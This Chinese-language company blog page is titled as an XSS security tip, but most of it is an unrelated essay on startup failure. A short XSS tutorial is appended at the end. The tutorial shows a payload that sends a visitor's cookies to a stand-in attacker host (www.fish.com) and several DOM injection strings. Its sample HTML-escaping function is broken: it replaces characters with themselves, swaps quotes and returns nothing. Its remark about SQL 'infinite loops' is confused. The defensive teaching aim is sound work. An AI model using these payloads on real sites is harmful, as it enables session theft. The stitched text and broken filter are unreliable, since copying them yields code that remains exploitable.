艾銻無限安全提示：跨站攻擊(XSS)及防御

2020-03-10 11:52 作者：admin 瀏覽量：

據不完全統計,中國有近5000萬家中小微企業,這個數據隨著互聯網的發展還在持續增長,但這些企業的存活率是非常低的,60%的初創企業活不過1年,30%的初創企業活不過3年,還有超過9%的企業只有5年左右的生存期,剩下不到1%的企業活過5年以上,幸運的可以達到10年,甚至更長一些.
 
為什么中小微企業的存活率這么低呢? 透過成千上萬的失敗案例,我們總結了以下五大方面的原因:
 
第一,創業失敗創始人難辭其咎,我們在學校里是沒有一堂課是教如何創業,如何才能創業成功,即使現在有很多大學嘗試著在學校開辦一些創業的課程,也不系統,更不專業,因為創業是一件極其復雜的工作,是需要多項技能的集合以及熟練的運用才有可能應對突如其來的變化,創業初期就像一艘孤獨的小船面對波濤洶涌的大海,但船長從來都沒有開過任何一艘船駛出過海港,風浪來的時候,只有慌張和恐懼,最后被海水吞沒.
 
第二,創業失敗是價值觀不統一,方向不一致,團隊不團結,風平浪靜,風和日麗,其實沒什么關系,大家都在享受陽光帶來的美好和快樂,只有遇到風浪,生死攸關或個人利益受到極大沖突時,人性的弱點才會突顯,當每個人只盯著個人得失或眼光短淺時,如果這個時候創始人沒有力挽狂瀾,強大的信念和人格魅力來一統所有人的行動準則,在危機中遲疑,就等于在死神面前跳舞,當年阿里的“中國供應商”客戶涉嫌欺詐事件,如果不是馬云明察秋毫,當即立斷,我相信也不會有今天阿里世界霸主的地位.
 
第三,創業失敗是固步自封,看不見高山,如果我們只能看見自己的山最高,沒有走出去,沒有學習的心態,沒有敬畏之心,很快時代就會把我們淘汰,當年的諾基亞,柯達就是最好的例子.無論企業多大,都要有一顆創業的心,永遠相信還能做的更好,還可以再創新,還會想出其它的可能性.真正的對手不在外面,而在我們心中,心中無敵,才能無敵于天下.
 
第四,創業失敗是誤解了”客戶是上帝”,上帝并不是時時都知道自己要什么,我們不能只限于客戶表面的表達就決定了他們的需求,很多企業死就死在客戶的假需求中,看起來好像是客戶追求的產品,需要的服務,但實際當產品生產出來,當服務送到客戶面前,并沒有真正吸引到客戶的注意,愿意為此而買單,核心本質就是我們曲解了”客戶是上帝”這句話,真正的上帝是不會當自己是至高無上的,也不會對品質無底限的追求,更不會對服務沒有節制要求,其實客戶就是客戶,他們絕大部分人都是普通人,有著普通人的欲望,有著普通人的不滿足,有著普通人想要花更少的錢卻要得到更多的意識,他們的只忠誠于更便宜更高的品質,這一切都是企業需要認知到的本質,不然你的”上帝”是不會為你持續付費的.
 
第五,創業失敗是講多了人情講少了制度,公司小,三五個人可以不需要任何制度,甚至也不需要任何系統,因為那時彼此聯結非常深,情感的能量可以喚醒每個人的斗志和決心 ,但當企業發展到幾十個人甚至幾百個人時,那種深深的聯結感很難在感受到,人性的弱點就會被環境所喚醒,就會被利益所綁架,就會被自私所控制,但也不是有了制度就有了保障,制度是人的工具,制度最終是服務于人,只有促進發展的制度,可能激勵人性向善的制度才能長久, 反之亦然.
如果你想想創立一家公司?
如果你是一家剛剛開始創業的公司?
如果你現在在創業的過程中遇到了挑戰?
 
結合上面的五大常見創業失敗,我們總結出來了五個可以讓你有更大成功機率的法則,可以讓你活的更久一些,但不保證你一定成功,因為事事變化,因緣和合,萬法無常,只能隨機而變.
 
第一法則:準備自己
創始人需要自我審視,首先要準備好自我犧牲的精神,要做好大海有風暴的思想準備,其次利用一切可以實踐的機會去鍛煉自己的綜合能力,不僅僅相信前輩和書本的聲音,更需要相信實戰后帶來的思考和反思.即要有遠大的理想和抱負,又要有腳踏實地做好每一件事的決心.
 
第二法則:認識自我
創始人要極早的認識自我,想清楚為什么要創業比創業更重要,清晰明確的了解自己的價值是什么?什么是自己會堅持的,什么是自己抗拒的,混亂的價值觀就會吸引五花八門的人,企業內部的斗爭都是創始人自己思想的斗爭,初創企業所呈現出來的一切現象都是創始人內在的顯化.當年阿里快速成長,內部也出現了一系列的問題,但極其智慧的馬云沒有去解決這些問題,反而把自己關在道觀中整整7天,最后終于想明白了三個問題:我要什么,我有什么,我要放棄什么,當他想清晰這三個問題后,并向全公司傳遞出來,最后所有那些紛繁復雜的問題都不解自明.
第三法則:持續打開
創始人的天花板就是企業的天花板,企業無法突破,就是創始人沒有突破自己,突破其實不容易,因為固有的觀念就像萬里長城一樣,非一日之功,是多少個春夏秋冬,嚴寒酷暑的積累和沉淀,這些不是沒有價值,而是幫助過我們創了價值,讓我們來到了今天這一步,但如果我們期望有一個更大的世界,就需要放下它們,放下我們曾經一直的堅持和執著,打開自己,讓自己接納一個全新的可能性,也許過不了多久,我們又會把這些新的東西奉為圭臬但只要我們還想看到一個更大的可能性,就需要再次打開自己,重新建立認知,我們一生都是在打開和重建過程中,直到生命的終結,又一切回歸原點.
 
第四法則:回歸本質
創始人剛開始需要和團隊一起參與戰斗,甚至做具體細節工作,因為初創需要激情來點燃,而創始人是這個團隊最有激情的一個人,初創團隊需要有人帶動去點燃更大的燃料.當所有團隊和部門走向正軌時,創始人更大的價值是深度的思考,有效的區分,精神的引領和正確的選擇.
企業越來越大,事情就會越來越多,如果沒有一個清醒的大腦保持深度的思考,就像讓企業很多人很忙,忙是一種現象,并不代表有價值,只有透過深度思考發現事物的本質,才知道忙什么才是最重要的,
懂得有效的區分是一個領導者必須掌握的能力, 《尼布爾的祈禱文》說:”上帝，請賜予我平靜，去接受我無法改變的。給予我勇氣，去改變我能改變的，賜我智慧，分辨這兩者的區別。”只有具備分辨的智慧,才不會讓自己誤入歧途.
創始人要有強大的精神力量,讓所有員工感受到這股力量,因為所有的成功都離不開一個偉大的精神領袖,就像蘋果的喬布斯,微軟的比爾蓋茨和阿里的馬云.
選擇比努力更重要,這句話告訴我們順勢而為的選擇可以讓我們在同樣的努力情況下獲得不同的結果,如何才能具備這樣明智選擇的能力呢,強大的深度思考能力和有效的區分能力就可以幫到我們看見正確的選擇.
 
第五法則:創造系統
創始人是人,是人就會有七情六欲,就會有生老病死,就會有悲歡離合,這些人性的因素會讓我們很不穩定,但企業能持久有效的運轉一定是在穩定的能量下運行,所以不能始終靠人來推動,企業想要活的久一定是有內生的系統,只有建立一個自動運轉的系統才能保持穩定健康的成長. 以上的分享像從管子里看豹，只看見豹身上的一塊花斑，看不到全豹,以此拋磚引玉,希望有更多人可以把自己創業的經歷和經驗分享出來,從而讓我們更全面的看見一家企業怎樣做才能活得久,活的好,活的更有價值.
 
1.艾銻無限安全提示：跨站攻擊(XSS)及防御
 
 
1. XSS的含義
 顧名思義，就是向web頁面或者網站的url添加惡意的script(腳本)代碼，使用戶訪問該網站時，執行惡意代碼，從而達到攻擊的目的。
發生XSS的場景：
1. 網站對用戶的輸入過濾不足，返回給用戶的展示結果過濾不足。
2. 網站的鏈接地址未經過過濾
2. 如何進行攻擊
攻擊種類多種多樣，通常包含如下：
1. 向網站注入腳本，獲取訪問用戶的cookie或者其他會話信息（session information）等私有數據
2. 通過注入腳本，將受害者的網頁重定向到攻擊者控制的網頁
3. 通過注入腳本，在用戶的計算機上執行其他惡意操作 
3. XSS攻擊分類
 XSS攻擊分為3類： 存儲型（持久型)、反射型（非持久型）、基于DOM型。危害程度遞減。
 存儲型（Stored/Persistent XSS Attacks）  危害程度最大，可能危及所有用戶！
 注入的腳本永久的存儲在目標服務器中。當瀏覽器發送數據請求時，受害者和網站的其他用戶都會再次拿到惡意腳本。
 <示例>：
網站的評論功能
評論提交后，存儲到服務器。所有訪問該網站的用戶自動從服務器拉取到惡意代碼。 
// 在評論框中輸入惡意腳本，提交到服務器
hello<script>廣告等</script>
反射型（Reflected/Non-Persistent XSS Attacks）  一般只危害當前操作用戶 
誘騙用戶點擊惡意鏈接、提交一個被篡改過的表單、瀏覽惡意網站，將惡意代碼注入到訪問者的網站。
web服務器將注入的腳本反射到用戶的瀏覽器，比如通過錯誤信息、查詢結果等返回瀏覽器。
瀏覽器會執行這些惡意代碼，因為它假定響應來自于已經交互過的“受信任的”服務器。
<示例>： 
在<img>的url上寫入一個腳本，將本地的cookie通過訪問地址發送到攻擊者的服務器
<img src=`http://www.fish.com:81?cookie=${document.cookie}` />
基于DOM型（DOM-based XSS Attacks）
攻擊最小，一般通過操作瀏覽器腳本的DOM對象，修改DOM節點屬性，在DOM節點插入閉合標簽等，進行攻擊。
<示例>：
通過輸入框給圖片的src賦值，展示圖片
        <input type="text" id="web" /> <button id="add">添加圖片</button>
        <div class="box"></div>
        <script src="/node_modules/jquery/dist/jquery.js"></script>
        <script>
            // 不基于后端， 基于DOM，通過修改屬性、插入內容、document.write    
            // 改變結構后造成攻擊
            // 攻擊的內容成為xss payload           
            $("#add").on('click', function() {
                // <img src="" onerror="alert(1)" id=""/>
                // " onerror="alert(1)" id="
                // <img src=""><script>alert(1)<\/script>"">   
                // "><script>alert(1)<\/script>"
                $(".box").html(`<img src=${$('#web').val()} />`)
            })
        </script>
 
 4. 如何避免攻擊
所有的攻擊歸根結底都是該過濾的沒有過濾，該轉義的沒有轉義。比較完整的避免攻擊方式，需要做以下三步：
1. 客戶端傳遞給服務器時，需要校驗先過濾一下。
   這個方法不能解決問題，因為攻擊者可能會模擬ajax請求。
2. 服務器端再過濾一下
3. 直接在輸出的時候過濾
4. HttpOnly： 防止js讀取cookie后傳遞到第三方
過濾方法：
 
        function encodeHtml(str) {
            str.replace(/&/g, '&').
            replace(/'/g, '"').
            replace(/"/g, ''').
            replace(/</g, '<').replace(/>/g, '>')
        }
 
對于單引號或雙引號，如果輸入內容用于后臺或者本地存儲的sql拼接，會導致死循環等惡意結果。